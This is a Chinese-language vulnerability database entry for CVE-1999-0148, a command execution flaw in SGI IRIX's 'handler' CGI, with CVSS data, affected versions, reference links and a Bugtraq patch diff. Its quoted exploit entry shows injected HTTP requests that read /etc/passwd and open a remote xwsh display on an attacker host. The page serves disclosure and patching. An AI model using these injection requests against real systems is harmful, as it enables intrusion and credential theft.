CVE-1999-0148
CVSS7.5
发布时间 :1997-09-01 00:00:00
修订时间 :2008-09-09 08:33:50
NMCOE    

[原文]The handler CGI program in IRIX allows arbitrary command execution.


[CNNVD]IRIX cgi-bin处理程序漏洞(CNNVD-199709-004)

        IRIX的处理程序CGI允许任意命令的执行。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sgi:irix:6.3SGI IRIX 6.3
cpe:/o:sgi:irix:6.2SGI IRIX 6.2
cpe:/o:sgi:irix:5.3SGI IRIX 5.3
cpe:/o:sgi:irix:6.4SGI IRIX 6.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0148
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0148
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199709-004
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/380
(UNKNOWN)  BID  380
ftp://patches.sgi.com/support/free/security/advisories/19970501-02-PX
(UNKNOWN)  SGI  19970501-02-PX

- 漏洞信息

IRIX cgi-bin处理程序漏洞
高危 输入验证
1997-09-01 00:00:00 2005-05-02 00:00:00
远程※本地  
        IRIX的处理程序CGI允许任意命令的执行。

- 公告与补丁

        A suitable patch was posted to Bugtraq:
         *** handler.orig Wed Jul 23 20:49:26 1997
         --- handler Wed Jul 23 20:55:25 1997
         ***************
         *** 26,31 ****
         --- 26,32 ----
         $pathRoot = $_[$#_] ;
         $doc = $ROOT.$PATH ;
        + $_ = $PATH;
         &ErrBadPath unless &ValidPath ; # Check for server spoofing
        #__________________________________________________________
         ***************
         *** 108,113 ****
         --- 109,117 ----
        sub ValidPath
         {
         + # suggested by drazvan@kappa.ro
         + if (/[|;]/) { return '' };
         +
         return 1 unless /\.\./ ;
        return '' if /^\.\./ ;
         ***************
         *** 117,120 ****
         --- 121,136 ----
         return 1 ;
         }
        + sub ErrBadPath
         + {
         + print <         + Content-type: text/html
        + 404 Not Found
         +

404 Not Found


         + The requested URL $PATH was not found on this server.


         +
         + ENDOFTEXT
         +
         + die ;
         + }
        Please go to SGI support at
        http://support.sgi.com> for official patches from Silicon Graphics for this any other vulnerabilities.

- 漏洞信息 (19303)

SGI IRIX <= 6.4 cgi-bin handler Vulnerability (EDBID:19303)
multiple remote
1997-06-16 Verified
0 Razvan Dragomirescu
N/A [点击下载]
source: http://www.securityfocus.com/bid/380/info

A vulnerability exists in the cgi-bin program 'handler', as included by Silicon Graphics in their Irix operating system. This vulnerability will allow a remote attacker to execute arbitrary commands on the vulnerable host as the user the web server is running as. This can easily result in a user being able to access the system.

telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download HTTP/1.0

or:

telnet target.machine.com 80
GET /cgi-bin/handler/blah;/usr/sbin/xwsh -display yourhost.com|?data=Download

NOTE: large spaces are actually tabs. 
		

- 漏洞信息

85
IRIX handler CGI Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Workaround
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

1997-06-15 Unknow
1997-06-15 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站